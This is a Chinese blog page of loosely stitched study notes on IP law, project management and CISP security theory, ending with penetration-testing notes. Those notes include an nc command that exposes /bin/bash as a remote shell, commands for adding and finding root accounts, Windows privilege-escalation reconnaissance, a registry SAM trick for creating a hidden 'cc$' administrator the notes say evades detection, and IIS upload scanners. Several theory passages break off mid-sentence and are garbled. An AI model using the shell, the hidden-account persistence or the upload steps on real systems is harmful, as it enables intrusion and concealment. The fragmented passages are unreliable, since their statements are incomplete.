arissa666的博客

与著作相关，类似权利，通常指表演者，录音制作者，广播电视组织在传播作品的活动方面因劳务和投资而享有的权力，即作品传播者的权利。广义---著作权，领接权，专利权，商标权及商业秘密权，防止不正当竞争权，植物新品种权，集成电路布图设计圈、地理标志权。文字作品，口述作品，美术建筑作品，摄影作品，设计图，图形作品和模型作品，艺术作品，常见的一些法规：合同法，招投标法，著作权法，政府采购法。狭义---著作权，领接权，专利权，商标权。委托开发的，A委托B，没约定注册权属于B。特征：无体性，专有性，地域性，时间性。

行政收尾，检查成员和干系人是否按规定履行了所有职责总结会准备：全面项目人员共同进行，列出执行过程中若干优点和缺点，讨论重点呈现总结会内容：项目绩效，技术绩效，成本绩效，进度计划绩效，项目的沟通，识别问题和解决问题，意见和建议。

保密性--最小授权原则，防暴露，信息加密，物理保密，网络安全协议，身份认证服务，数据加密完整性---协议，纠错编码，密码校验，数字签名，公证，CA认证，防火墙系统，入侵检测系统可用性---数据冗余及备份，磁盘和系统的容错，安全进程和机制不可抵赖性。

风险分类：分类性质：纯粹风险，投机风险---对应火灾，股票买卖产生原因：自然，社会，政治，经济，技术风险性质：客观性，偶然性，相对性，社会性，不确定性风险过程：5计划1监控5计划：规划风险，识别风险，实施定性风险分析，实施定量风险分析，规划风险应对，1监控：控制风险风险因素：风险偏好，风险承受力，风险临界值。

使实际执行情况和项目基准相一致的管理。变更性质：重大变更，重要变更，一般变更。由不同审批权限控制。变更迫切性：紧急变更，非紧急变更发生领域：进度，成本，质量，设计，实施，工作范围都会变更变更原因：过失或疏忽，新需求，应对风险，执行和基准不一致，人员调整，技术革新，外部事件。

开发文档----开发过程本身。可行性研究报告和项目，需求规格，功能规格说明，设计规格说明，包括程序和数据规格说明，开发，软件集成和测试计划，质量保证计划，安全和测试信息。产品文档----开发过程的产物。培训，参考手册，用户指南，软件支持手册，产品手册和信息广告。管理文档----项目管理信息。进度和进度记录，变更情况，职责定义。1级---最低限度文档---开发自用，工作量低于1个人2级---内部文档3级---工作文档---同已单位内若干人联合开发4级---正式文档---正式发行供普遍使用的软件产品。

4过程：规划，实施，控制，结束。

总承包合同----大承包商单向项目承包合同----吸引承包人竞争分包合同----总承建的把某一部分分包给其他人。分包限制资质条件，且需发包人同意，知只能将非关键，非主体部分进行分布，不可二次分包。

沟通渠道：M=n*（n-1）/2，n是人数大于等于1沟通噪音：外部，内部，语义噪音沟通方式3类：参与讨论方式，征询方式，推销方式，叙述方式-----控制程度由弱到强实际表现为头脑风暴，调查问卷，叙述结束，劝说鼓动沟通渠道2类：文字，语音----文字没有控制力不利于情感传递。语言没有文字精确。

1计划：规划人力资源管理3执行：组建项目团队，建设项目团队，管理项目团队。

3过程：计划，执行，监控项目管理是在时间，范围，成本和质量都达到项目干系人的期望。质量关系到干系人的满意度。质量指挥和控制活动：质量方针，质量目标；质量规划，质量保证，质量控制，质量改进。管理阶段：手工艺人时代质量检验阶段----计划职能和执行职能相分离统计质量控制阶段----美-休哈特提出控制和预防缺陷，统计过程控制理论；道奇和罗明提出统计抽样检验；戴明提出生产和经营系统的问题，强调最高管理层对质量管理的责任。全面质量管理阶段----美费根和朱兰提出全面质量管理理论TQM；

规划成本管理，估算成本，制定预算，控制成本。

将工作包分解为活动，对项目工作进行估算，进度规划，执行，监督和控制的基础一个工作包有一个或多个活动里程碑清单---里程碑是一个时间点，持续时间为0，不消耗资源也不花费成本。

明确项目工作。

是一项综合性和全局性的管理工作有6大过程：制定项目章程，制定项目管理计划指导和管理项目工作，监控项目工作，实施整体变更控制，结束项目或阶段项目整体管理是项目管理的核心，各要素间相互协调，矛盾，目标中寻找最佳平衡点。

场地选择考虑抗震、承重、防火、防水、供电、空气调节、电磁防护、雷击及静电。

历史：古典的数据安全---近代的机械密码--现代的密钥保密算法不保密--公钥的密钥分发和管理科克霍夫Kerckhoff原则：算法公开，密钥保密。

广义的是系统生命周期上集成的动态过程，狭义的是规划设计实施网络安全防护措施的过程。解决系统生命周期过程安全问题：与信息化同步规划、建设、使用安全工程四个方面：动机、机制、策略、保证。

是针对潜在影响正常执行其职能的行为产色产生干扰或破坏的因素进行识别、评价的过程广义上是综合的包括测试、检测、测评、审核、评估检查等进行综合评价和预测；狭义的就是某个信息安全风险风评。

业务连续性BC---business continuity业务连续性管理BCM---找出潜在威胁对业务运行影响，有效保护措施，提供恢复能力的整体管理过程业务驱动，业务部们主导，IT和网络安全参与核心：考虑业务中断影响BCM负责人：业务相关负责人 分析关键资产，这些关键资产的威胁和出现威胁对业务的影响 业务目标，范围，内容，边界，流程，关系 判断优先级：经济产值，核心技术，公共服务能力 资产分析，威胁分析，脆弱性分析，安全措施分析 影响程度高低

准备---预防为主检测---主动检测确认发生事件的严重性、性质和影响---4级中哪级7类中哪类--责任人--影响范围遏制---防止范围扩大损失上升---平衡时间空间---断网，封锁根除---根源解决，标本兼治，避免在发生恢复---恢复系统，业务，消除部分影响跟踪总结---总结经验教训，标志应急响应报告，进入司法程序调查。

安全检查-----特点环境任务，系统或设备的点对点检查，确定是否符合安全标准或规范。没有安全评估全面，也不安全评估里的包括政策、流程、控制措施。的安全评估方法，发现系统问题，验证系统抵抗攻击能力和安全控制措施的有效性。比渗透测试需要更多时间和人力。---发现系统漏洞，不能发现未知漏洞。密码的策略，防火墙设置更新。，证明系统位置漏洞和安全漏洞。内审+第三方审，比较详细。安全审计---安全合规流程，是。过程-对象-方法-执行-结果。的评估方法，安全合规流程，是。测量是衡量管理有效的。----发现系统中的。

控制类型：预防、检测、纠正、威慑控制措施结构：14方面方针、组织、人力资源安全、资产管理、访问控制加密技术、物理和环境安全、操作安全、通信安全、系统的获取开发及维护供应商关系、信息安全事件管理、业务连续性管理中的信息安全、符合性。

ISO/IEC 27001-27006每个标准都有不同的指南、标准、要求。

GB/Z 24364 信息安全风险管理指南小知识：GB是国标，是强制标准；GB/T是国家推荐标准，有法律约束性；GB/Z是国家指导标准，仅供使用者参考。

管理对象：包括人在内的信息相关资产管理组成：人员、目标、规则、过程。

项目管理，PMP

云计算安全关键技术：可信访问控制、密文检索与处理、数据存在与可使用性、数据安全与隐私保护、虚拟化安全技术。存在风险：开源工具、优先访问权、管理权限、数据处、数据隔离、数据恢复、调查支持、长期发展风险。IaaS、PasS、SaaS(裸机，装好软件的电脑，装好应用的电脑)传输可以被物理破坏、信息篡改、信息泄露、攻击----北斗，还是卫星。感知层可以被物理破坏、欺骗、信息泄露----红外、声呐、测速。物联网技术架构4层：感知、传输、支撑、应用。隐私保护，招聘，通信记录，电话，行程，文档。支撑层有虚拟平台问题。

满足法规合规、业务需求、风险评估信息系统保护轮廓ISPP-----标准化安全保障需求文档----从规范化、机构化需要包括：系统描述、安全环境、保障目的、安全保障要求、应用注解、符合性声明7部分。

ISO信息安全：为数据处理系统建立和采取，保护计算机硬件、软件、数据不因偶然的或恶意的原因而受到破坏、更改、泄露信息安全属性：CIA三元组：保密性、完整性、可用性其他属性：真实性、不可否认性、可问责性、可控制（比如数字签名就是抗抵赖的应用）分类：通信安全，信息系统安全，数据安全，信息安全，网络安全，信息技术安全，网络空间安全产生问题原因：内因：系统复杂产生漏洞外因：环境，人为安全特征：系统安全，动态安全，无边界安全，非传统安全。

软考，PMP，CISP

MySQL\data\mysql 里面的user.MYD文件，需要编译查看。

下面是windows主机找到nc打开1.bat输入：nc 连接的IP地址 端口受害主机是nc -lvvp 端口 -t -e /bin/bashkali系统连接。

查看管理员用户grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'三种不同添加账户的方法chpasswd , useradd -p ,echo -e。cat /etc/passwd查看用户可以看到刚才添加的用户。su -l 用户名可以切换到指定用户。查看内核，操作系统和设备信息。系统信息uname -a。当前用户whoami。

vim /etc/apache2/ports.conf 键盘输入i 进入插入编辑模式，修改apache2默认监听端口号为8080 ，编辑好后，按Esc键+“：wq!（注：端口也可以不修改）在终端输入“/etc/init.d/apache2 start” 启动apache服务。找到www目录，用rz传输文件，下面演示是传了一个01.php的文件。netstat -lnt可以查看运行的服务和端口。输入IP+端口就可以看到apache。如果需要搭建网站在此目录上传源码即可。

运行输出密码到5.txt。

常见提权方法溢出漏洞提权数据库提权第三方软件提权常用提权命令whoami 查看用户权限systeminfo 查看操作系统，补丁情况ipconfig 查看当前服务器IPnet user 查看当前用户netstat -ano 查看当前网络连接情况netstat -ano| find "ESTABLISHED" 查找ESTABLISHED的状态tasklist 查看当前进程情况taskkill 结束进程taskkill -PID xx 强制结束net start 启动服务。

win+R 运行regedit打开注册表编辑器，找到SAM把读取勾选上，关闭后重新打开注册表编辑器。因为cc$文件保存出现问题，重新保存成ww$，如果无法添加到注册表，把SAM权限更改为完全控制。也可以把上面的命令绑定到注册表运行的文件上运行自启动创建用户，waf无法发现。这种用注册表创建的用户，图形化界面和命令行查看都看不到这个用户。图形化界面导出admin用户和刚才创建的cc$信息。regedit /e 目录文件名 注册表。刚才复制的注册表点击添加到注册表。删除刚才创建的cc$

破壳扫目录7KB扫目录safe3扫漏洞

用DotNetScan 工具把目标网站IP，端口填写下。找到IIS的网站后就可进行操作上传。也可以使用IISPutScanner工具。